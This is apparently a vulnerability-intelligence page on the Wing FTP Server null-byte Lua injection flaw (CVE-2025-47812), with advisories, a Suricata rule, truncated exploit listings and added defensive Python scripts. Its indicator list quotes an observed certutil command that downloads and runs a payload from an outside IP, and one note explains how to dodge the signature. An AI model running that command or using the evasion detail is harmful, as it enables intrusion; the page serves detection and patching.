CVE-2025-47812
Published 2025-07-10
Priority: P1 (score 100, critical). CVSS 3.1 base score 10.0, vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, remediation due 2025-08-04
Exploited in the wild
EPSS: 95.34% (99.9th percentile)
In Wing FTP Server before 7.4.4, the user and admin web interfaces mishandle '\0' bytes, ultimately allowing injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default). This is thus a remote code execution vulnerability that guarantees a total server compromise. It is also exploitable via anonymous FTP accounts.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wftpserver | wing_ftp_server | < 7.4.4 | 7.4.4 |
| wftpserver | wing_ftp_server | <= 7.4.4 | — |
The second, open-ended range should be read alongside CVE-2025-47811 below: the null-byte Lua injection itself is fixed in 7.4.4, but the root/SYSTEM execution context in which any injected code runs is not.
Detection & IOCs (extracted from the sources cited below)
- Command IOC (certutil download-and-execute seen post-exploitation):
  certutil -urlcache -f http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe
- The same command as a hex byte string, for byte-level matching:
  636572747574696c202d75726c6361636865202d6620687474703a2f2f3138352e3139362e392e3232353a383038302f454f70343565574c53703547355577705f794f436951202554454d50255c6d76766569574a48782e6578652026207374617274202f42202554454d50255c6d76766569574a48782e657865
- Hunt for anomalously large .lua session files in the Wing FTP session directory (C:\Program Files (x86)\Wing FTP Server\session); normal session files are small, so inflated sizes indicate an injected Lua payload.
- Session .lua files containing the patterns 'local function hx(s)' or 'io.popen(cmd)' indicate active Lua code injection exploitation of CVE-2025-47812.
- Monitor POST requests to /loginok.html containing a null byte (raw 0x00 or URL-encoded %00) in the username parameter; this is the primary exploitation vector, and the Suricata rule further down matches both encodings.
- Alert on child processes spawned by WFTPServer.exe executing cmd.exe with reconnaissance commands (ipconfig, whoami, arp -a, net user) as post-exploitation indicators.
- For CVE-2025-47813 (chained with CVE-2025-47812), detect POST requests to /loginok.html with an overlong UID cookie (2048+ bytes) that trigger error responses disclosing the server filesystem path.
- Use Shodan/FOFA queries to identify exposed Wing FTP Server instances: http.html_hash:2121146066, http.favicon.hash:963565804, title:"Wing FTP Server", or a Server header of "Wing FTP Server".
- Session object files are named with exactly 64 hexadecimal characters and a .lua extension; new files appearing in the session directory during or after suspicious login attempts warrant immediate review.
- Anonymous login enabled on Wing FTP Server significantly lowers the exploitation bar: attackers can inject Lua without any credentials when anonymous access is permitted.
- CVE-2025-47811 (Wing FTP running as root/SYSTEM with no privilege drop) was deemed unimportant by the vendor and remains unpatched even in v7.4.4, so any RCE via CVE-2025-47812 automatically yields highest-privilege execution.
- The second trigger request (the one that deserializes the malicious session) can be any valid Wing FTP web endpoint, not just dir.html; defenders should not rely solely on monitoring dir.html requests.
- Wing FTP log entries truncate the attacker's IP address during exploitation because of the null byte; the IP is only recoverable from the session .lua files themselves, not from the domain logs.
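A hunting script for the session-directory indicators above (added example; this is not Wing FTP Server, Huntress or vendor code). The 64-hex-character file naming and the 'local function hx(s)' / 'io.popen(cmd)' markers come from the indicators listed; the session-file contents it writes, the 4 KiB size threshold and the temporary directory are constructed for the demonstration and do not reflect the real session-file format.

```python
"""Hunt a Wing FTP session directory for injected Lua (added example).

Heuristics taken from the indicator list:
  * session objects are named with exactly 64 hex characters plus '.lua'
  * legitimate session files are small; injected ones are inflated
  * payloads seen in the wild contained 'local function hx(s)' and 'io.popen(cmd)'
The size threshold is an assumption; baseline it against known-good sessions.
"""
import os
import re
import tempfile

SESSION_NAME = re.compile(r"^[0-9a-fA-F]{64}\.lua$")
INJECTION_MARKERS = ("local function hx(s)", "io.popen(cmd)", "os.execute(")
SIZE_THRESHOLD = 4096  # bytes; assumed, see docstring


def scan_session_dir(path, size_threshold=SIZE_THRESHOLD):
    """Return [(filename, [reasons])] for session objects worth reviewing."""
    findings = []
    for name in sorted(os.listdir(path)):
        if not SESSION_NAME.match(name):
            continue  # not a session object, ignore it
        full = os.path.join(path, name)
        reasons = []
        size = os.path.getsize(full)
        if size > size_threshold:
            reasons.append(f"size {size} > {size_threshold}")
        with open(full, "rb") as fh:
            body = fh.read()
        for marker in INJECTION_MARKERS:
            if marker.encode() in body:
                reasons.append(f"contains {marker!r}")
        if reasons:
            findings.append((name, reasons))
    return findings


def build_sample_dir():
    """Create a constructed session directory: one benign session, one with
    injected Lua, and one non-session file that must be ignored.
    File contents are made up; they are not the real session-file layout."""
    d = tempfile.mkdtemp(prefix="wftp_session_")
    benign = "a" * 64 + ".lua"
    with open(os.path.join(d, benign), "wb") as fh:
        fh.write(b'UID = "user1"\nLOGIN_TIME = 1751328000\n')
    evil = "b" * 64 + ".lua"
    with open(os.path.join(d, evil), "wb") as fh:
        fh.write(b'UID = "anonymous"\n')
        fh.write(b"local function hx(s) return s end\n")
        fh.write(b"local p = io.popen(cmd)\n")
    with open(os.path.join(d, "notes.txt"), "wb") as fh:
        fh.write(b"io.popen(cmd)\n")  # wrong name pattern, must not be reported
    return d, benign, evil


if __name__ == "__main__":
    sample_dir, _, _ = build_sample_dir()
    for fname, why in scan_session_dir(sample_dir):
        print(fname, "->", "; ".join(why))
```

Point scan_session_dir at the real directory (for example r"C:\Program Files (x86)\Wing FTP Server\session") after baselining normal file sizes. A clean result does not prove the host is clean: a session object can be removed after the second trigger request, so pair this with the process-tree and HTTP-log checks above.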
CVSS provenance
- NVD: v3.1 10.0 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- VulnCheck: 10.0 CRITICAL
- CISA: 10.0 CRITICAL
CISA
Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
cisa·2025-07-14·CVSS 10.0
CVE-2025-47812 [CRITICAL] CWE-158 Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
Vulnerability: Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
Affected: Wing FTP Server (vendor: Wing FTP Server)
Wing FTP Server contains an improper neutralization of null byte or NUL character vulnerability that can allow injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default).
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.wftpserver.com/serverhistory.htm ; https://nvd.nist.gov/vuln/detail/CVE-2025-47812
Remediation Due Date: 2025-08-04
GHSA
GHSA-j4xf-75rr-vvrv: In Wing FTP Server before 7
ghsa_unreviewed·2025-07-10
CVE-2025-47812 [CRITICAL] CWE-158 GHSA-j4xf-75rr-vvrv: In Wing FTP Server before 7
In Wing FTP Server before 7.4.4, the user and admin web interfaces mishandle '\0' bytes, ultimately allowing injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default). This is thus a remote code execution vulnerability that guarantees a total server compromise. It is also exploitable via anonymous FTP accounts.
GHSA
GHSA-r7h5-5g56-gv3h: In Wing FTP Server through 7
ghsa_unreviewed·2025-07-10·CVSS 10.0
CVE-2025-47811 [CRITICAL] CWE-267 GHSA-r7h5-5g56-gv3h: In Wing FTP Server through 7
In Wing FTP Server through 7.4.4, the administrative web interface (listening by default on port 5466) runs as root or SYSTEM by default. The web application itself offers several legitimate ways to execute arbitrary system commands (i.e., through the web console or the task scheduler), and they are automatically executed in the highest possible privilege context. Because administrative users of the web interface are not necessarily also system administrators, one might argue that this is a privilege escalation. (If a privileged application role is not available to an attacker, CVE-2025-47812 can be leveraged.) NOTE: the vendor reportedly considers this behavior "fine to keep."
VulnCheck
Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
vulncheck·2025·CVSS 10.0
CVE-2025-47812 [CRITICAL] CWE-158 Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability
Wing FTP Server contains an improper neutralization of null byte or NUL character vulnerability that can allow injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default).
Affected: Wing FTP Server (vendor: Wing FTP Server)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/m
Suricata
ET WEB_SPECIFIC_APPS Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
suricata·2025-07-07·CVSS 10.0
CVE-2025-47812 [CRITICAL] ET WEB_SPECIFIC_APPS Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
ET WEB_SPECIFIC_APPS Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/loginok.html"; fast_pattern; http.referer; content:"|2f|login.html"; http.request_body; content:"username|3d|"; pcre:"/^[^\x26]*?(?:\x00|\x2500)/R"; reference:url,www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/; reference:cve,2025-47812; classtype:web-application-attack; sid:2063316; rev:1; metadata:attack_target Server, created_at 2025_07_07, cve CVE_2025_47812, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag C
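The matching logic of the rule above, re-implemented in Python over constructed requests so each condition can be exercised offline (added example; this is not the Emerging Threats rule and not Wing FTP Server code). The host name ftp.example.test and every request body are placeholders; the regular expression mirrors the rule's `username=` content match followed by `/^[^\x26]*?(?:\x00|\x2500)/R`.

```python
"""Python model of ET sid 2063316 (added example, not the rule itself).

The rule fires on: POST, URI containing /loginok.html, a Referer containing
/login.html, and a request body where a raw NUL or the literal "%00" appears
after "username=" but before the '&' that ends that parameter.
"""
import re

# Equivalent of content:"username|3d|" plus pcre /^[^\x26]*?(?:\x00|\x2500)/R
NULL_IN_USERNAME = re.compile(rb"username=[^&]*?(?:\x00|%00)")


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, uri, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return {"method": method.decode(), "uri": uri.decode(errors="replace"),
            "headers": headers, "body": body}


def matches_et_2063316(req: dict) -> bool:
    """True when a parsed request satisfies every condition of the rule."""
    if req["method"] != "POST":
        return False
    if "/loginok.html" not in req["uri"]:
        return False
    if "/login.html" not in req["headers"].get("referer", ""):
        return False  # the rule keys on the Referer header as well
    return NULL_IN_USERNAME.search(req["body"]) is not None


def build_samples() -> dict:
    """Constructed requests (placeholder host, made-up credentials)."""
    def req(body, referer=b"http://ftp.example.test/login.html",
            method=b"POST", uri=b"/loginok.html"):
        hdrs = [b"Host: ftp.example.test",
                b"Content-Type: application/x-www-form-urlencoded",
                b"Content-Length: " + str(len(body)).encode()]
        if referer is not None:
            hdrs.append(b"Referer: " + referer)
        return (method + b" " + uri + b" HTTP/1.1\r\n"
                + b"\r\n".join(hdrs) + b"\r\n\r\n" + body)

    return {
        "encoded_null_in_username": req(b"username=anonymous%00&password=x"),
        "raw_null_in_username": req(b"username=anonymous\x00&password=x"),
        "benign_login": req(b"username=alice&password=hunter2"),
        "null_only_in_password": req(b"username=alice&password=%00x"),
        "no_referer": req(b"username=anonymous%00&password=x", referer=None),
    }


def classify(samples: dict) -> dict:
    """Map sample name -> whether the modelled rule would alert."""
    return {name: matches_et_2063316(parse_request(raw))
            for name, raw in samples.items()}


if __name__ == "__main__":
    for name, hit in classify(build_samples()).items():
        print(f"{name:28s} alert={hit}")
```

Note the last sample: the rule requires a Referer containing /login.html, so a client that omits or rewrites that header sends the same null-byte username without triggering this signature. Treat the rule as one layer and also check the application's own access log for null bytes in the username parameter on /loginok.html.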
Exploit-DB
Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
exploitdb·2025-07-02·CVSS 10.0
CVE-2025-47812 [CRITICAL] Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
---
# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
# CVE: CVE-2025-47812
# Date: 2025-06-30
# Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)
# Vendor Homepage: https://www.wftpserver.com/
# Version: Wing FTP Server <= 7.4.3
# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)
# Description:
# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE)
# flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the 'username'
# parameter during login, leading to Lua code injection into session files. These maliciously crafted
# session files are subsequently execut
Nuclei
Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
nuclei·CVSS 10.0
CVE-2025-47813 [CRITICAL] Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813). The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further exploitation (e.g., CVE-2025-47812) by revealing the application's file system layout.
Template:
id: CVE-2025-47813
info:
name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
author: rcesecurity,pdteam
severity: medium
description: |
Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information di
Metasploit
Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
metasploit·CVSS 10.0
CVE-2025-47812 [CRITICAL] Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)
Wing FTP Server allows arbitrary Lua code injection via a NULL-byte (%00) truncation bug (CVE-2025-47812). Supplying %00 as the username makes the C++ authentication routine validate only the prefix, while the full string is written unfiltered into the session file and later executed with root/SYSTEM privileges, leading to Remote Code Execution.
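The prefix-validation versus full-buffer-write mismatch described above, modelled in Python beside a hardened version (added example; this is not Wing FTP Server code and not the Metasploit module). The session-file layout (`UID = "..."`), the account allow-list and the probe string are assumptions made for illustration; the probe's tail after the NUL is only a Lua comment.

```python
"""Model of the CWE-158 bug behind CVE-2025-47812 and a hardened variant.
Added example. The session-file layout and allow-list are assumptions."""

ALLOWED_USERS = {b"anonymous", b"alice"}  # assumed accounts


def c_string(buf: bytes) -> bytes:
    """Model a C/C++ consumer working on a `const char*`: everything after
    the first NUL byte is invisible to it."""
    return buf.split(b"\x00", 1)[0]


def authenticate_vulnerable(username: bytes) -> bool:
    """Validates only the NUL-terminated prefix (e.g. 'anonymous')."""
    return c_string(username) in ALLOWED_USERS


def write_session_vulnerable(username: bytes) -> bytes:
    """Interpolates the full, length-aware buffer into the Lua session
    object, so bytes after the NUL land in the file unfiltered."""
    return b'UID = "' + username + b'"\n'


def authenticate_hardened(username: bytes) -> bool:
    """Reject NUL anywhere, then compare the whole buffer, never a prefix."""
    if b"\x00" in username:
        return False
    return username in ALLOWED_USERS


def lua_quote(s: bytes) -> bytes:
    """Emit a Lua string literal in the spirit of string.format('%q'):
    escape backslash, double quote and newline, and write control bytes
    (NUL included) as decimal \\ddd escapes so nothing can end the literal."""
    out = bytearray(b'"')
    for ch in s:
        if ch in (0x22, 0x5C):          # '"' and '\'
            out += b"\\" + bytes([ch])
        elif ch == 0x0A:                # newline
            out += b"\\n"
        elif ch < 0x20 or ch == 0x7F:   # control bytes, including NUL
            out += b"\\%03d" % ch
        else:
            out.append(ch)
    out += b'"'
    return bytes(out)


def write_session_hardened(username: bytes) -> bytes:
    """Only authenticated, NUL-free names reach the file, and even then they
    are emitted as a quoted literal rather than spliced into source text."""
    if not authenticate_hardened(username):
        raise ValueError("authentication failed")
    return b"UID = " + lua_quote(username) + b"\n"


# Constructed probe: a valid prefix, a NUL, then text that closes the Lua
# string and starts a new line. Only a harmless Lua comment follows here.
PROBE = b'anonymous\x00"\n-- attacker-controlled Lua would follow this line'


def demo() -> dict:
    """Show both code paths on the probe."""
    return {
        "vulnerable_auth_ok": authenticate_vulnerable(PROBE),
        "tail_reaches_file": b"attacker-controlled" in write_session_vulnerable(PROBE),
        "hardened_auth_ok": authenticate_hardened(PROBE),
    }


if __name__ == "__main__":
    print(write_session_vulnerable(PROBE).decode(errors="replace"))
    for key, value in demo().items():
        print(key, value)
```

Two independent fixes are shown because each closes the bug on its own: refusing NUL bytes (and comparing the whole buffer) removes the mismatch between what is checked and what is stored, and quoting the value as a Lua literal means that even a stored string cannot terminate the literal and begin new statements.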
Nuclei
Wing FTP Server <= 7.4.3 - Remote Code Execution
nuclei·CVSS 10.0
CVE-2025-47812 [CRITICAL] Wing FTP Server <= 7.4.3 - Remote Code Execution
Wing FTP Server <= 7.4.3 - Remote Code Execution
Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812). The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
Template:
id: CVE-2025-47812
info:
name: Wing FTP Server <= 7.4.3 - Remote Code Execution
author: rcesecurity,4m3rr0r
severity: critical
description: |
Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthentic
Metasploit
Wing FTP Server Authenticated Command Execution
metasploit
Wing FTP Server Authenticated Command Execution
Wing FTP Server Authenticated Command Execution
This module exploits the embedded Lua interpreter in the admin web interface for versions 3.0.0 and above. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
Bleepingcomputer
CISA flags Wing FTP Server flaw as actively exploited in attacks
blogs_bleepingcomputer·2026-03-16·CVSS 3.4
[LOW] CISA flags Wing FTP Server flaw as actively exploited in attacks
## CISA flags Wing FTP Server flaw as actively exploited in attacks
## Sergiu Gatlan
CISA warned U.S. government agencies to secure their Wing FTP Server instances against an actively exploited vulnerability that may be chained in remote code execution attacks.
Wing FTP Server is a cross-platform FTP server software that also provides secure file transfer via its built-in SFTP and web servers. The developers claim that their file transfer software is used by more than 10,000 customers worldwide, including the U.S. Air Force, Sony, Airbus, Reuters, and Sephora.
Tracked as CVE-2025-47813 , the security flaw allows threat actors with low privileges to discover the full local installation path of the application on unpatched servers.
"Wing FTP Server contains a generation of error message
Bleepingcomputer
Hackers are exploiting critical RCE flaw in Wing FTP Server
blogs_bleepingcomputer·2025-07-12·CVSS 3.4
CVE-2025-47812 [LOW] Hackers are exploiting critical RCE flaw in Wing FTP Server
## Hackers are exploiting critical RCE flaw in Wing FTP Server
## Bill Toulas
Hackers have started to exploit a critical remote code execution vulnerability in Wing FTP Server just one day after technical details on the flaw became public.
The observed attack ran multiple enumeration and reconnaissance commands followed by establishing persistence by creating new users.
The exploited Wing FTP Server vulnerability is tracked as CVE-2025-47812 and received the highest severity score. It is a combination of a null byte and Lua code injection that allows a remote unauthenticated attacker to execute code with the highest privileges on the system (root/SYSTEM).
Wing FTP Server is a powerful solution for managing secure file transfers that can execute Lua scripts, which is widely used in ent
Huntress
Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited in the Wild
blogs_huntress·2025-07-10·CVSS 10.0
CVE-2025-47812 [CRITICAL] Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited in the Wild
## Summary
TL;DR : Huntress saw active exploitation of Wing FTP Server remote code execution (CVE-2025-47812) on a customer on July 1, 2025. Organizations running Wing FTP Server should update to the fixed version, version 7.4.4, as soon as possible.
CVE-2025-47812 is a null byte and Lua injection flaw that can lead to root/SYSTEM-level remote code execution if exploited. The vulnerability was first publicly disclosed on June 30 by Julien Ahrens in versions prior to 7.4.4 of the Wing FTP Server, its file transfer protocol software for Windows, Linux, and macOS.
At a high level, CVE-2025-47812 stems from how null bytes are handled in the username parameter (specifically related to the loginok.html file, which handles the authentication process). This can allow remote attackers to perform
Greynoiseio
NoiseLetter July 2025
blogs_greynoiseio
References
- https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
- https://www.vicarius.io/vsociety/posts/cve-2025-47812-detection-script-remote-code-execution-vulnerability-in-wing-ftp-server
- https://www.vicarius.io/vsociety/posts/cve-2025-47812-mitigation-script-remote-code-execution-vulnerability-in-wing-ftp-server
- https://www.wftpserver.com
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-47812
- https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild
Timeline
- 2025-07-10: Published
- 2025-07-14: Added to CISA KEV
- Exploited in the wild